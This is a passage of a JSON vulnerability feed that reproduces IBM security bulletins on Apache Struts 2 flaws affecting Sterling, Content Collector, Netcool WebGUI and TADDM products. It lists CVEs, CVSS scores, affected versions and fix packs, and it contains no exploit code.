\n \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90987> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:N/A:P) \n\n\n## Affected Products and Versions\n\nSterling Order Management 8.5 \nIBM Sterling Selling and Fulfillment Foundation 9.0 \nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Field Sales 9.0 \nIBM Sterling Field Sales 9.1.0 \nIBM Sterling Field Sales 9.2.0 \nIBM Sterling Field Sales 9.2.1 \nIBM Sterling Field Sales 9.3.0 \nSterling Web Channel 9.0 \nSterling Web Channel 9.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix pack or security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**| **_Security Fix Pack*_**| **_How to acquire fix_** \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0- SFP2_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1-SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.0.0| **_9.0.0- SFP3_**| 
**_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nSterling Order Management 8.5| **_8.5- SFP3_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nIBM Sterling Field Sales 9.0| **_SFS9.0-SFP3_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nIBM Sterling Field Sales 9.1.0| **_SFS9.1.0- SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** **_Select appropriate VRMF_** \nIBM Sterling Field Sales 9.2.0| **_SFS9.2.0- SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** **_Select appropriate VRMF_** \nIBM Sterling Field Sales 9.2.1| **_SFS9.2.1- SFP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** **_Select appropriate VRMF_** \nSterling Web Channel| **_9.0.0-FP6_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** **_Select appropriate VRMF_** \nSterling Web Channel| **_9.1.0- FP3_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** **_Select appropriate VRMF_** \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](<http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web 
Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n18/06/2014 : Original Copy Published \n08/07/2014: Removed Sterling Field Sales 9.3 and replaced with Sterling Selling and Fulfillment Foundation 9.3.0. \n24/07/2014: Changes include: \n\\- Added vulnerability CVE-2014-0050 under Vulnerability Details \n\\- Added IBM Sterling Field Sales 9.3.0 under Affected Products and Versions and Remediation/Fixes \n\\- Updated fix versions for following products under Remediation/Fixes. Old version in parentheses: \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 - (9.3.0- SFP1) \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 - (9.2.1- SFP2) \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 - (9.2.0- SFP2) \nIBM Sterling Selling and Fulfillment Foundation 9.1.0 - (9.1.0- SFP2) \nIBM Sterling Selling and Fulfillment Foundation 9.0.0 - (9.0.0- SFP2) \nSterling Order Management 8.5 - (8.5- SFP2) \nIBM Sterling Field Sales 9.0 - (SFS9.0- SFP2) \nIBM Sterling Field Sales 9.1.0 - (SFS9.1.0- SFP2) \nIBM Sterling Field Sales 9.2.0 - (SFS9.2.0- SFP2) \nIBM Sterling Field Sales 9.2.1 - (SFS9.2.1- SFP2)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. 
Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SS6QYM\",\"label\":\"Sterling Selling and Fulfillment Suite\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"9.2.1;9.2;9.1;9.0;8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {}, "published": "2020-02-11T21:39:06", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management, IBM Sterling Configure, Price, Quote and Sterling Web Channel are affected by Apache Struts 2 security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113"], "modified": "2020-02-11T21:39:06", "id": "85068BA05AFB9468D768F124D70E29FEAA718CF85C40196DF1FFB790C80EABFF", "href": "https://www.ibm.com/support/pages/node/514267", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:51:21", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3093_](<https://vulners.com/cve/CVE-2016-3093>) \n**DESCRIPTION:** Apache Struts is vulnerable to a 
denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n\n**CVEID:** [_CVE-2016-4436_](<https://vulners.com/cve/CVE-2016-4436>) \n**DESCRIPTION:** An unspecified error in Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114183_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0 \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. 
\n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.5.0| **_9.5.0-SFP1_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP2_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP4_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1- SFP5_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP5_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP5_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T20:08:21", "type": "ibm", "title": "Security Bulletin: IBM Sterling 
Order Management is affected by Apache Struts 2 security vulnerabilities (CVE-2016-3093 , CVE-2016-4436)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093", "CVE-2016-4436"], "modified": "2018-06-16T20:08:21", "id": "D3960A5391CDBC3EFE71D2AF6765F7AAC5104A881ACFC37A5D48C02CA2E26DF0", "href": "https://www.ibm.com/support/pages/node/293437", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content 
Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:08:30", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:08:30", "id": "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "href": "https://www.ibm.com/support/pages/node/6356619", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:50:43", "description": "## Summary\n\nFix is available for vulnerabilities in Apache Struts affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, 
CVE-2019-0230).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| APAR | Remediation/First Fix \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ27034| Apply Fix Pack 20 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 20](<https://www.ibm.com/support/pages/node/6236916> \"Fix Pack for WebGUI 8.1.0 Fix Pack 20\" )) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T04:29:58", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-09-23T04:29:58", "id": "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "href": "https://www.ibm.com/support/pages/node/6336355", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:44:04", 
"description": "## Summary\n\nVulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager (CVE-2019-0233, CVE-2019-0230)\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n**DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager | 7.3.0.7 \n \n## Remediation/Fixes\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.22_FP7200218.zip | 7.3.0.7 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=UpR3LS6M2oBcbLFNfcXFzqCsw2d008xhOwZDwfQ15h0> \"Download eFix\" ) \n \nPlease familiarize yourself with the eFix readme in etc/<efix_name>_readme.txt\n\n## Workarounds and Mitigations\n\nThe above eFix is applicable and can be downloaded and applied directly.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T13:33:14", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2021-04-13T13:33:14", "id": "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "href": 
"https://www.ibm.com/support/pages/node/6347964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:13", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:04:41", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:04:41", "id": "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "href": "https://www.ibm.com/support/pages/node/6359443", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:12", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially 